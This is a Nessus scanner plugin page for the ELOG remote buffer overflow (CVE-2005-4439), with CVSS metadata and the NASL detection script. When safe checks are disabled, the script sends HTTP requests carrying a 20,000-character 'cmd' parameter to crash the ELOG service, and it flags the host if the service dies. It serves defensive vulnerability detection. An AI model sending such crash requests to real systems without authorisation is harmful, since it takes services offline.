Nessus plugin ELOG_OVERFLOWS.NASL — This script is Copyright (C) 2005-2022 Tenable Network Security, Inc.
History: Dec 19, 2005 - 12:00 a.m.

ELOG Remote Buffer Overflow Vulnerabilities

2005-12-19 00:00:00
This script is Copyright (C) 2005-2022 Tenable Network Security, Inc.
www.tenable.com
22

7.8 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:N/I:N/A:C

0.093 Low

EPSS

Percentile

94.8%

The remote host appears to be using ELOG, a web-based electronic logbook application.

The version of ELOG installed on the remote host crashes when it receives HTTP requests with excessive data for the ‘mode’ and ‘cmd’ parameters. An unauthenticated attacker may be able to exploit these issues to execute arbitrary code on the remote host subject to the privileges under which the application runs.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

# Plugin registration: when Nessus loads the script in "description" mode
# it only records the metadata below and exits without touching the target.
if (description)
{
  script_id(20321);
  script_version("1.23");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2005-4439");
  script_bugtraq_id(15932);

  script_name(english:"ELOG Remote Buffer Overflow Vulnerabilities");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by remote buffer overflow flaws.");
  script_set_attribute(attribute:"description", value:
"The remote host appears to be using ELOG, a web-based electronic
logbook application. 

The version of ELOG installed on the remote host crashes when it
receives HTTP requests with excessive data for the 'mode' and 'cmd'
parameters.  An unauthenticated attacker may be able to exploit these
issues to execute arbitrary code on the remote host subject to the
privileges under which the application runs.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2005/Dec/949");
  # No vendor fix was known when the plugin was written; the solution text
  # has not been updated since.
  script_set_attribute(attribute:"solution", value:
"Unknown at this time.");
  # Availability-only impact: the reproduced effect is a service crash.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:U/RC:ND");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2005/12/19");
  script_set_attribute(attribute:"plugin_publication_date", value:"2005/12/19");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  # thorough_tests widens the directory list probed in the active check below.
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  # ACT_MIXED_ATTACK: behaviour depends on the safe-checks setting -- with
  # safe checks on, only the banner is inspected; with them off, the active
  # check may crash the remote service.
  script_category(ACT_MIXED_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2005-2022 Tenable Network Security, Inc.");

  # Needs the web server banner collected by http_version.nasl; ELOG's
  # built-in server defaults to port 8080.
  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 8080);

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

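port = get_http_port(default:8080, embedded: 0);

# Make sure the server looks like ELOG.  The check is only meaningful against
# ELOG's own HTTP server, so leave quietly when the banner does not match.
banner = get_http_banner(port:port);
if (!banner || "Server: ELOG HTTP" >!< banner) exit(0);

if (safe_checks()) {
  # Safe checks enabled: never send the oversized request.  Fall back to the
  # banner version, but only when paranoid reporting was requested, because
  # a version string alone is weak evidence.
  if ((report_paranoia > 1) && (egrep(pattern:"^Server: ELOG HTTP ([01]\.|2\.([0-5]\.|6\.0))", string:banner))) {
    report = string(
      "\n",
      "Nessus determined the flaw exists on the remote host based solely\n",
      "on the version number of ELOG found in the banner."
    );
    security_hole(port:port, extra:report);
  }
  exit(0);
}

# Active check: an oversized 'cmd' parameter crashes vulnerable versions, so
# this path is intrusive.  Build the directory list first.
if (thorough_tests) dirs = list_uniq(make_list("/elog", "/demo", cgi_dirs()));
else dirs = make_list(cgi_dirs());

# A service that is already down cannot be attributed to our request.
if (http_is_dead(port:port)) exit(0);

foreach dir (dirs) {
  # Try to exploit the flaw to crash the service.
  r = http_send_recv3(
    method:"GET",
    item:string(dir, "/?", "cmd=", crap(20000)),
    port:port
  );

  if (isnull(r) || strlen(r[2]) == 0) {
    # No reply: confirm the service itself died rather than a transient
    # network hiccup before reporting anything.
    if (http_is_dead(port:port)) {
      report = string(
        "\n",
        "Nessus was able to crash the remote ELOG server by sending an HTTP\n",
        "request with an oversized 'cmd' parameter."
      );
      security_hole(port:port, extra:report);
      exit(0);
    }
  }
  # The server answered normally; presumably a single ELOG process serves
  # every path, so one surviving request is taken as "not vulnerable" and
  # the remaining directories are not hammered -- TODO confirm.
  else exit(0);
}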

7.8 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:N/I:N/A:C

0.093 Low

EPSS

Percentile

94.8%